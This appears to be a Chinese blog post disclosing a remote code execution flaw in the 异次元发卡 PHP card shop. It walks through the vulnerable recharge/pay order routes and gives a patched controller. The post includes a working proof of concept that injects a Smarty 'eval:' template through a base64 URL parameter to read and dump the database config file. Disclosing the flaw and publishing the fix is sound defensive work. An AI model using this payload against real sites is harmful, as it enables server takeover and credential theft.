异次元发卡执行任意代码漏洞最新
站长 • 2024-05-14 19:43 • 182 次点击 • 技术文章
漏洞路由
1 https://xxx.com/user/pay/order
2 https://xxx.com/user/recharge/order
涉及文件
app/Controller/User/Pay.php
app/Controller/User/Recharge.php
第一个文件 acg/app/Controller/User/Pay.php
在1.2.9版本更新中已经修复
第二个文件 /app/Controller/User/Recharge.php
<?php
declare(strict_types=1);
namespace App\Controller\User;
use App\Controller\Base\View\User;
use App\Interceptor\UserSession;
use App\Interceptor\Waf;
use App\Model\Config;
use App\Model\UserGroup;
use App\Model\UserRecharge;
use Kernel\Annotation\Interceptor;
use Kernel\Exception\JSONException;
use Kernel\Util\View;
#[Interceptor(Waf::class, Interceptor::TYPE_VIEW)]
class Recharge extends User
{
    /**
     * Recharge centre page: parses the "recharge-amount" welfare lines from
     * config and lists the user groups ordered by their recharge threshold.
     *
     * @return string rendered theme page
     * @throws \Kernel\Exception\ViewException
     */
    #[Interceptor(UserSession::class)]
    public function index(): string
    {
        $rechargeWelfareConfig = explode(PHP_EOL, (string)Config::get("recharge_welfare_config"));
        $welfareConfig = [];
        foreach ($rechargeWelfareConfig as $item) {
            // each config line is "<recharge>-<amount>"; a line without '-' leaves $ape[1] unset
            $ape = explode("-", trim($item));
            $welfareConfig[] = [
                "recharge" => $ape[0],
                "amount" => $ape[1]
            ];
        }
        return $this->theme("充值中心", "RECHARGE", "User/Recharge.html", [
            "welfareConfig" => $welfareConfig,
            'groupNext' => UserGroup::get($this->getUser()->recharge, true),
            "groups" => UserGroup::query()->orderBy("recharge", "asc")->get()
        ]);
    }

    /**
     * Payment page for a recharge order (vulnerable version).
     *
     * Reads a base64-encoded query string from _PARAMETER[0] containing
     * tradeNo, type, handle and code. tradeNo selects the order; type 2
     * renders the auto-submit form from the stored order option; any other
     * type renders a payment-channel template whose name is built from the
     * request-supplied handle and code (see the comment on the last return).
     *
     * NOTE(review): unlike index(), this action has no UserSession
     * interceptor, so it appears reachable without a logged-in session —
     * confirm against the router.
     *
     * @throws \Kernel\Exception\JSONException when type is 2 and the order has no option data
     * @throws \Kernel\Exception\ViewException
     */
    public function order(): string
    {
        $obj = [];
        // _PARAMETER[0] is request-controlled; every key of $obj is attacker-chosen
        parse_str(base64_decode(urldecode((string)$_GET['_PARAMETER'][0])), $obj);
        // look up the order
        $order = UserRecharge::query()->where("trade_no", $obj['tradeNo'])->first();
        if (!$order) {
            return '订单不存在';
        }
        $type = (int)$obj['type'];
        $data = (array)json_decode((string)$order->option, true);
        if ($type == 2) {
            if (!$data) {
                throw new JSONException("参数错误");
            }
            return $this->render("正在下单,请稍后..", "Submit.html", [
                "url" => $order->pay_url,
                "data" => $data
            ]);
        }
        // VULNERABLE: handle and code come straight from $obj and are concatenated
        // into the template name handed to View::render(); nothing ties them to the
        // order's payment channel, so the request decides which template resource the
        // Smarty engine loads. The patched version reads handle/code from the order's
        // Pay record and rejects a request whose values do not match it.
        return View::render($obj['handle'] . '/View/' . $obj['code'] . '.html', ['order' => $order, 'option' => $data], BASE_PATH . '/app/Pay/');
    }
}
<?php
declare (strict_types=1);
namespace Kernel\Util;
class View
{
/**
 * Render a Smarty template located under $dir with the given variables.
 *
 * Configures a fresh engine with the project's `#{ ... }` delimiters and the
 * runtime cache/compile directories, assigns every entry of $data as a
 * template variable, fetches the template and passes the output through the
 * RENDER_VIEW hook. $template is handed to Smarty unchanged, so it must come
 * from trusted code: Smarty interprets resource prefixes (such as `eval:`) in
 * the name, which means a request-controlled value must never reach this
 * parameter.
 *
 * @param string $template template name, resolved relative to $dir
 * @param array  $data     variables to expose to the template
 * @param string $dir      template directory
 * @return string rendered output after the RENDER_VIEW hook has run
 * @throws \SmartyException
 */
public static function render(string $template, array $data = [], string $dir = BASE_PATH . '/app/View'): string
{
    $smarty = new \Smarty();
    $smarty->setTemplateDir($dir);
    $smarty->setCacheDir(BASE_PATH . '/runtime/view/cache');
    $smarty->setCompileDir(BASE_PATH . '/runtime/view/compile');
    // project-wide delimiters; templates use #{...} instead of {...}
    $smarty->left_delimiter = '#{';
    $smarty->right_delimiter = '}';
    array_walk($data, static function ($value, $name) use ($smarty): void {
        $smarty->assign($name, $value);
    });
    $html = $smarty->fetch($template);
    // hook consumers get the rendered output before it is returned
    hook(\App\Consts\Hook::RENDER_VIEW, $html);
    return $html;
}
简易的使用代码
<?php
// Demonstration of the defect in Recharge::order(): it shows that the request can
// choose the template resource, because `handle` is concatenated unchecked into
// the name given to View::render(). The patched controller renders from the
// order's Pay record instead and rejects a mismatching handle/code.
$tradeNo= 'xxxxx';// placeholder: trade number of an existing recharge order on the site
$eval ='eval:#{$database=file_get_contents("config/database.php")}#{var_dump($database)}';
$base64 = urlencode(base64_encode('type=1&tradeNo='.$tradeNo.'&handle='.$eval. '&code=1'));
echo $base64;
// the encoded value is appended to the route
// 'https://xxx.com/user/pay/order.'.$base64 product order
// 'https://xxx.com/user/recharge/order.'.$base64 recharge order
输入到浏览器访问即可执行，当然还可以执行其他恶意代码。
修复代码
将下方的代码复制到 app/Controller/User/Recharge.php 进行覆盖保存
<?php
declare(strict_types=1);
namespace App\Controller\User;
use App\Controller\Base\View\User;
use App\Interceptor\UserSession;
use App\Interceptor\Waf;
use App\Model\Config;
use App\Model\UserGroup;
use App\Model\UserRecharge;
use Kernel\Annotation\Interceptor;
use Kernel\Exception\JSONException;
use Kernel\Util\View;
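#[Interceptor(Waf::class, Interceptor::TYPE_VIEW)]
class Recharge extends User
{
    /**
     * Recharge centre page: parses the "recharge-amount" welfare lines from
     * config and lists the user groups ordered by their recharge threshold.
     *
     * @return string rendered theme page
     * @throws \Kernel\Exception\ViewException
     */
    #[Interceptor(UserSession::class)]
    public function index(): string
    {
        $rechargeWelfareConfig = explode(PHP_EOL, (string)Config::get("recharge_welfare_config"));
        $welfareConfig = [];
        foreach ($rechargeWelfareConfig as $item) {
            // each config line is "<recharge>-<amount>"; a line without '-' has no amount
            $ape = explode("-", trim($item));
            $welfareConfig[] = [
                "recharge" => $ape[0],
                "amount" => $ape[1] ?? null, // same value as before for a malformed line, without the undefined-index warning
            ];
        }
        return $this->theme("充值中心", "RECHARGE", "User/Recharge.html", [
            "welfareConfig" => $welfareConfig,
            'groupNext' => UserGroup::get($this->getUser()->recharge, true),
            "groups" => UserGroup::query()->orderBy("recharge", "asc")->get()
        ]);
    }

    /**
     * Payment page for a recharge order.
     *
     * Reads a base64-encoded query string from _PARAMETER[0] containing
     * tradeNo, type, handle and code. tradeNo selects the order; type 2
     * renders the auto-submit form from the stored order option. For any
     * other type the payment-channel template is chosen from the order's Pay
     * record only; the request-supplied handle and code are accepted solely as
     * a consistency check and never used to build the template name.
     *
     * NOTE(review): unlike index(), this action has no UserSession
     * interceptor — confirm whether unauthenticated access is intended.
     *
     * @throws \Kernel\Exception\JSONException when the order option is empty, the
     *         order's payment channel cannot be found, or handle/code do not match it
     * @throws \Kernel\Exception\ViewException
     */
    public function order(): string
    {
        $obj = [];
        // _PARAMETER[0] is request-controlled; treat every key of $obj as untrusted
        parse_str(base64_decode(urldecode((string)($_GET['_PARAMETER'][0] ?? ''))), $obj);

        // look up the order
        $order = UserRecharge::query()->where("trade_no", $obj['tradeNo'] ?? '')->first();
        if (!$order) {
            return '订单不存在';
        }

        $type = (int)($obj['type'] ?? 0);
        $data = (array)json_decode((string)$order->option, true);
        if ($type === 2) {
            if (!$data) {
                throw new JSONException("参数错误");
            }
            return $this->render("正在下单,请稍后..", "Submit.html", [
                "url" => $order->pay_url,
                "data" => $data
            ]);
        }

        // The stored payment channel decides the template; find() yields null for
        // an unknown pay_id, which must not reach the property reads below.
        $pay = \App\Model\Pay::query()->find($order->pay_id);
        if ($pay === null) {
            throw new JSONException("支付方式不存在");
        }
        // Strict string comparison: loose == would treat numeric strings such as
        // "1" and "01" as equal.
        $handle = (string)($obj['handle'] ?? '');
        $code = (string)($obj['code'] ?? '');
        if ($handle !== (string)$pay->handle || $code !== (string)$pay->code) {
            // Fail through the framework's JSON error path, consistent with the
            // type-2 branch, instead of header()+exit() inside a method declared
            // to return string.
            throw new JSONException("参数错误");
        }
        return View::render($pay->handle . '/View/' . $pay->code . '.html', ['order' => $order, 'option' => $data], BASE_PATH . '/app/Pay/');
    }
}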